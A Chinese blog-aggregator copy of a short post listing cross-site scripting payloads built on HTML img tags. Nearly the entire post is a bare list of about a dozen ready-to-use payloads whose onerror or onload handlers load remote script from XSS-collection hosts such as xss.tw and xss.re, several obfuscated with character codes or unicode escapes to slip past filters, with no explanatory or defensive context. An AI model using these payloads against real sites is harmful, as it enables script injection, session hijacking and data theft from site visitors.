zoukankan      html  css  js  c++  java

  • Xss里img标签的一些利用

    <img src=x onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974"></img>
    “><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
    <img src=1 onerror=jQuery.getScript("//xss.re/974")> 
    <img src="#" onerror="$.getScript('u002fu002fxss.twu002f4091')">
    <img src="#" onerror="var a=String.fromCharCode(47);$.getScript(a+a+'xss.tw'+a+'4091')">
    <img src='0' onerror=with(document)body.appendChild(createElement('script')).src='/xx'>
    <img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" onload="s=document.createElement('script');s.src='http://xx'+Math.random();document.body.appendChild(s)" border="0">
    <img src=i onerror=eval(jQuery.getScript('//xss.tw/4091'))>
    <img src=N onerror=eval(javascript:document.write(unescape(' <script src="http://xxx.js"></script>'));)>
    <img src=x onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js'>
    <img src=x onerror="with(document)body.appendChild(createElement('script')).src='http://xss.tw/4814'" width="0" height="0"></img>
  • 相关阅读:
    牛影传说【线段树+BFS序运用】
    动态规划 :传纸条
    CQYZ-OJ P1377 危险的组合
    使用 git 管理你的配置文件
    Exponential Distribution
    初尝 C++ 类设计
    Android刷机的一般步骤
    重装 Linux 记录
    Linux 折腾记录 (非正式)
    最大熵对应的概率分布
  • 原文地址:https://www.cnblogs.com/hookjoy/p/3538487.html
Copyright © 2011-2022 走看看